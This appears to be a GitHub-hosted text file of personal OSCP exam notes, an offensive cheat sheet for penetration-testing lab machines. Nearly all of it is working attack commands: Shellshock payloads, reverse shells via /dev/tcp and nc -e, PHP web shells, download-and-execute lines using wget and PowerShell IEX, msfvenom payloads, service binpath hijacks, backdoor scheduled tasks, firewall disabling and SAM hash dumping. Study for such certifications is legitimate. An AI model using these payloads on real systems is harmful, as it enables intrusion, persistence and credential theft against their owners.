-
Notifications
You must be signed in to change notification settings - Fork 37
/
Copy pathoscp_notes.txt
1311 lines (941 loc) · 40.2 KB
/
oscp_notes.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
This file conains all the notes i did during my preparation for the OSCP exam.
=================
START FTPD: /etc/init.d/vsftpd start
make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
SHELLSHOCK
==========
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
nmap 10.11.1.71 -p 80 \
--script=http-shellshock \
--script-args uri=/cgi-bin/test.cgi --script-args uri=/cgi-bin/admin.cgi
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
* Shellshock via SSH
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
* cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
curl -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.178.102/9999 0>&1" "http://192.168.178.121:80/cgi-bin/status/"
* Shellshock run bind shell using netcat
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
FTP BOUNCE
==========
-> use ftp bounce attack on 10.11.1.125A to scan ports on 10.11.1.125B
nmap -vvvv -P0 -n -b 10.11.1.125A 10.11.1.125B -p-
Portscan Netcat
===============
nc -nvv -w 1 -z $ip 3388-3390
Temporary Web Server
===================
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
WEB ENUMERATION
============
* URL Enumeration
gobuster -u http://10.11.1.71/ \
-w /usr/share/seclists/Discovery/Web_Content/common.txt \
-s '200,204,301,302,307,403,500' -e
-s string
Positive status codes (dir mode only) (default "200,204,301,302,307)
if every non existing ULR gives 200 "Try again you N000b"
remove 200 from -s
-x for file-extension
-x asp
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,301,302,307,403,500' -e
uniscan -qweds -u <http://vm/>
REVERSE SHELL
=============
* Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/10.11.0.192/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
METASPLOIT
==========
* start up postgresql
systemctl start postgresql
* start up msfdb
msfdb start
* start up msf
msfconsole -q
msf > db_status
[ *] postgresql connected to msf
msf >
searchsploit drupal
searchsploit -x filepath
copy to clipboard the exploit:
searchsploit -p filepath
meterpreter reverse shell
set payload windows/meterpreter/reverse_tcp
PHP Exploitton through LFI
==========================
* Check for LFI Linux:
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../..//var/log/httpd-error.log
PHP Session Path
/var/tmp/sess_
/tmp/sess_
* Check for LFI Windows:
page=../../../../../../windows/system32/drivers/etc/hosts
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 shell-9001.ps1
at bottem:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.0.192 -Port 4444
copy shell-9001 to local web root
<?php system($_REQUEST['PleaseSubscribe']);>
<?php system($_REQUEST['cmd']);>
?PleaseSubscribe="PowerShell IEX(New-Object Net.WebClient).downloadString('http://10.10.0.192/shell-9001.ps1')"
-> IEX download and execute
on a windows 64 machine eplace powershell with
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe
press CTRL-u for URL code string in burp
- upload to a file this:
-> will download shell to /tmp/ and execute
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/shell; chmod +x shell; ./shell"); ?>
=> download php-serverse-shell rev.php and copy to dir where rev.php can executed via LFI
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/c99.php; cp c99.php /usr/local/database/c99.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; cp rev.php /usr/local/database/rev.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; php /tmp/rev.php "); ?>
... this is good when u can not cp into the www-root
.. also one only knows www-root-path by LFI
=> put a remote file into web-root/myshell from http://10.11.0.192/shell.txt
<?php function dl($u, $o){$c = file_get_contents($u);file_put_contents($o,$c);}dl("http://10.11.0.192/shell.txt",realpath(realpath(dirname(__FILE__)))."/myshell.php")?>
Windows Exploitation through ASP FILE UPLOAD
============================================
* Creating ASP Reverse Meterpreter Shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -l | grep windows
* start meterpreter handler in msfconsole
use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.192
LHOST => 10.11.0.192
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.192
set LPORT 4444
set ExitOnSession false
exploit -j
msf-> session -i 1
Meterpreter Reverse Shellcode
=============================
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed LHOST=10.11.0.192 LPORT=4444 -f python > shell.py
Windows Priviledge escalation Cheatset
=======================================
* Determine Service Pack
Window 2008:
systeminfo
OS Version: 6.1.760 N/A Build 7600
OS Version: 6.1.760 Service Pack 1 Build 7600
Hotfix(s): N/A
Windows XP:
type C:\Windows/system32\eula.txt
type C:\Windows\System32\license.rtf
* Hotfixes installed
dir C:\Windows\SoftwareDistribution\Download\*.* /s
type C:\Windows\WindowsUpdate.log
* List all Documents of all Users
dir /b /ad "C:\Documents and Settings\" /s
* get current windows version
type C:/Windows/system32/eula.txt
* current priviledges
whoami /priv Privileges associated with your account
whoami Get current username
* Other logged in Users
qwinsta
* Users on the system
net user
* Groups on the system
net localgroup
* Members of a group
net localgroup "Remote Desktop Users"
* Change password for user Bob
net user Bob *
* Create a user
net user /add [username] [password]
net user /add gamma gamma
* Run cmd.exe as Administrator
runas /savecred /user:administrator cmd
* to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv
sc query state= all
get all non-windows services:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
-> than check with icacls the permissions of the executeables
-> vulnerable like Everyone:(I)(F)
* Running Tasks
tasklist
* Kill a task
taskkill f /pid 7777
taskkill /f /im "Taskmgr.ex"
* start or stop a service
sc start
sc stop
* run command through smb when user/password is known
smbexec.py THINC/gamma:"mypassword"@10.11.118^C
* snmp configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
* UnQuoted Service Paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
* Permissions
icacls “C:\Example” Print permissions for “Example” directory
accesschk.exe -qwsu “Group” Objects modifyable by “Group” (try “Everyone”, “Authenticated Users”, and/or “Users”)
accesschk.exe -qwsu “Group” Objects modifyable by “Group” (try “Everyone”, “Authenticated Users”, and/or “Users”)
* Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk64.exe -uwdqs Users c:\*.*
* Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk64.exe -uwqs Users c:\*.*
accesschk64.exe -uwqs "Authenticated Users" c:\*.*
* Permissions to services
accesschk.exe -ucqv *
accesschk64.exe -ucqv *
accesschk.exe -cuwv "user" *
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet Service
Find weak service:
C:\Users\Public\ccesschk.exe -cuwv "user" *
Start Type is AUTO_START
sc cong blackwinterSrv binpath= "C:\temp_dir\nc.exe -nv 192.168.168.168 443 -e C:\WINDOWS\System32\cmd.exe"
* To see all global objects that Everyone can modify:
accesschk -wuo everyone \basednamedobjects
accesschk64 -wuo everyone \basednamedobjects
* See system log
wevtutil cl System
* XP: add user to adminustayorf group
net localgroup Administrators Bob /add
* find scheduled tasks
schtasks /query /fo LIST /v
Scheduled Tasks
Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
schtasks /query /fo LIST /v
This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and past it into my linux-terminal.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Task scheduled to run when RDP login fails:
SchTasks /Create /RU SYSTEM /SC ONEVENT /MO "*[System[EventID=4625]] and *[EventData[Data='USERNAME_BACKDOOR']]" /EC Security /TN "RDPBackdoor" /TR "C:\PAYLOAD.EXE" /F
schtasks /create /tn "SystemTask" /tr "cmd /C 'PAYLOAD.EXE'" /rl HIGHEST /ru SYSTEM /sc ONSTART
/tn specifies the name of the task
/tr specifies the command to run
/rl specifies run level. I don’t think this is related to Unix run levels, but is instead a privilege thing
/ru the user the payload is run under.
/sc is the frequency. we want it to run when the machine starts up.
* list all servics
sc query
* As Admin, create a user that is allowed to use Rdesktop
net user /add gamma gamma
net localgroup "Remote Desktop Users" gamma /add
net localgroup Administrators gamma /add
net localgroup "Backup Operators" gamma /add
* Search for interesting files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
dir *.zip /s
dir *.7z /s
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
dir /s *pass* == *cred* == *vnc* == *.config*
dir C:\*vnc.ini /s /b /c
dir C:\ /s /b /c | findstr /sr \*password\*
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
findstr /si password *.xml *.ini *.txt *.config 2>nul
* Query registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
* Check Credential Store for saved/chached Passwords
cmdkey.exe /list
runas /profile /savecred /user:Administrator <full path of executeable>
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
* Check if InstallAlwaysElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvemom -f msi -p windows/meterpreter/reverse_tcp
msfvenom -p windows/adduser USER=rottenadmin PASS=xxx -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
vulnerable if following output:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
A malicious .msi file can be created using msfvenom. Choose a desired payload and set use the -f msi flag to set the output format to MSI.
Then the payload can be executed on the vulnerable system using msiexec.
* Check for Unattended install
dir C:\Windows\Panther\
dir C:\Windows\Panther\Unattend\
dir C:\Windows\System32\
dir C:\Windows\System32\sysprep\
dir c:\Unattended.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s
* DLL Highjacking
* PowerSploit
* Unquoted Service Path
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
The path for PFNet’s service binary is unquoted and contains spaces.
Metasploit Module: exploit/windows/local/trusted_service_path
* Unattented Installs
https://toshellandback.com/2015/11/24/ms-priv-esc/
-> installations without user interactions containing credentials:
dir c:\Unattend.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s
* VNC Password location
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
Cracking:
root@kali:~/scripts/bruteforce# ./vncpwd/vncpwd /root/vnc_pwd
TightVNC
C:\>reg query HKEY_LOCAL_MACHINE\Software\TightVNC\Server /v Password
HKEY_LOCAL_MACHINE\Software\TightVNC\Server
Password REG_BINARY 2151D3722874AD0C
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
* Basic Commands
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
hostname
echo %username%
net users
net user user1
* Windows Firewall
Show Config: netsh firewall show config
allow port 3389: netsh firewall add portopening protocol=TCP name=3389 port=3389 mode=ENABLE
Turn Off:
$ netsh firewall set opmode disable
netsh advfirewall set currentprofile state off
* Enable RDP
Enabling RDP
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=udp
OR (meterpreter)
run post/windows/manage/enable_rdp
---
* Enable RDP access
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
* Neighbours
ipconfig /displaydns Shows DNS cache
netsh route print Print routing table
* WinXP dump hahes
reg.exe save HKLM\SAM sam
reg.exe save HKLM\SYSTEM sys
samdump2 sys sam
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
* view registry / ntuser.dat
fred
* upload files via ftp: (must be anon axxs)
echo open 10.11.0.192 > ftp.txt
@echo ftp>> ftp.txt
@echo ftp>> ftp.txt
@echo binary>> ftp.txt
@echo GET /nc.exe>> ftp.txt
echo quit >>ftp.txt
ftp -s:ftp.txt -v
* Download from HTTP via Powershell one-liner
(New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) PowerShell one-liner download a remote file to LocalPath
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.192/MS11-040.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "10.11.1.49"
[System.Diagnostics.Process]::Start("C:\Users\Public\nc","-e c:\windows\system32\cmd.exe 10.11.0.192 9999", $mycreds.Username, mycreds.Password, $computer)
powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File wget.ps1
* windows wget alternative
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo
The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
* Transfer via SMB
python /usr/local/bin/smbserver.py ROPNOP /oscp/exploit/windows/ms11-046/
impacket-smbserver ROPNOP /oscp/exploit/windows/ms11-046/
copy \\10.11.0.192\ROPNOP\MS11-040.exe
\\10.11.0.192\ROPNOP\MS11-040.exe
* Transfer via Webdav
/root/webdav_start.sh
net use x: http://10.11.0.192/
* Transfer via Certutil
certutil.exe -URL http://10.11.0.192/foobar
foobar is in C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
* tunnel only local reachable ports
plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445
Wir bauen einen SSH Tunnel um den MySQL zu erreichen.
Wir müssen also über SSH einen Tunnel für Port 3306 schaffen. Dazu bauen wir eine SSH Verbindung zu 1.2.3.4 auf und Tunneln Port 3306.
plink.exe -v -pw geheim [email protected] -L 6603:localhost:3306
* Compiling C windows exploits on Linux
> i686-w64-mingw32-gcc exploit.c -o exploit #64 Bit > i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 #32 Bit
* Windows LOOTING
https://tools.kali.org/password-attacks/creddump
* Run Powershell scripts
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Bethany\AppData\Local\Temp\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
* Windows compile python to .exe
net use z: \\tsclient\test
code in /root/rdesktopshare
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1>c:\Python27\python.exe pyinstaller.py --onefile z:\ms14-058.py
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
* Powershell RunAS
working:
echo $username = 'ftp' > runas.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo $script = 'c:\windows\system32\cmd.exe' >> runas.ps1
echo Start-Process -WorkingDirectory 'C:\Windows\System32' -FilePath $script -Credential $credential >> runas.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File runas.ps1
* Powershell reverse Netcat shell in C:\Users\Public\nc.exe with user ftp/foobar23
echo $username = 'ftp' > rev.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> rev.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> rev.ps1
echo $script= 'C:\Users\Public\nc.exe' >> rev.ps1
echo Start-Process -WorkingDirectory 'C:\Users\Public\' -FilePath $script -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> rev.ps1
echo $username = 'alice' > runas.ps1
echo $securePassword = ConvertTo-SecureString "aliceishere" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Windows\System32\cmd.exe -Credential $credential >> runas.ps1
Using Powershell to RunAs an administrative user:
echo $secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force > run.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
echo $computer = "DANCING-PARROT" >> run.ps1
echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", >> run.ps1
echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
powershell -ExecutionPolicy Bypass -File run.ps1
echo $username = ‘alice‘ > startprocess.ps1
echo $password = ‘aliceishere‘ >> startprocess.ps1
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force >> startprocess.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword >> startprocess.ps1
echo Start-Process ‘C:\Users\Public\nc.exe’ -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> startprocess.ps1
* Windows helpers
useradd.c
* Windows - Add user.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
return 0;
}
# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
SUID
* Set owner user ID.
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
# Compile
gcc suid.c -o suid
Powershell Run as
* Run file as another user with powershell.
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
Process Monitor
* Monitor processes to check for running cron jobs.
#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
sleep 1
old_process=$new_process
done
* Powershell Empire
in empire:
listeners
uselistener http
set Host http://10.10.14.30:443
set Port 443
execute
launcher powershell
copy output to a file empire.ps1 serving on local apache
in burp:
.. downloadString('.../empire.ps1
in empire:
interact agentid
searchmode PowerUp
usermodule privesc/powerup/allchecks
info
execute
* PowerUp.ps1
add the end: Invoke-AllChecks
when having code execution via .asp/.php/...
?fexec = echo "IEX(New-Object Net.WebClient).DownloadString('http://myip/PowerUp.ps') | powershell -noprofile -
* Sherlock
Sherlock.ps1
grep -i function Sherlock.ps1
Find-AllVulns
at the end append: Find-AllVulns
* Check if OS is 64bit
Powershell.exe
[environment]::Is64BitOperatingSystem
* Check if current process is a 64bit Process
[environment]::Is64BitProcess
Directories
SysWOW64 64bit Applictions available to 32bit Applications through emulation
SysNative -> 64bit processes live here
* when running 32bit app on a 64bit OS
Powershell.exe -> C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell
WIN XP SP0/SP1 local priviledge escalation
================================
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
nc -lvp 9988
net start upnphost
#list properties
sc qc "Vulnerable Service"
# check privileges
sc qprivs "Service name"
net user /add gamma gamma
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.192 6666 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
LINUX PRIVILEDGE ESCALATION
===========================
* What files run as root / SUID / GUID?:
find / -perm +2000 -user root -type f -print
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
* What folders are world writeable?:
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
SHELL SPAWNING
==============
python -c 'import pty; pty.spawn("/bin/sh")'
CTRL-Z
stty raw -echo
fg
stty size
stty -rows 48 -columns 120
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
(from man page)
!/bin/sh
Interesting Fils for Dirbuster Bruteforcing:
==============
mbox.bz2
mbox
WWW Directory enumeration
--------------------------
dirb http://10.11.1.72 /usr/share/wordlists/dirb/small.txt -x extensions_common.txt
based on Web Application:
/usr/share/seclists/Discovery/Web-Content
Windows SMB enumeration
-----------------------
* enum4linux -a <host~
* ms08-67
nmap -sU -sS --script smb-vuln-ms08-067.nse -p U:137,T:139 10.11.1.5
* os detection
nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.227
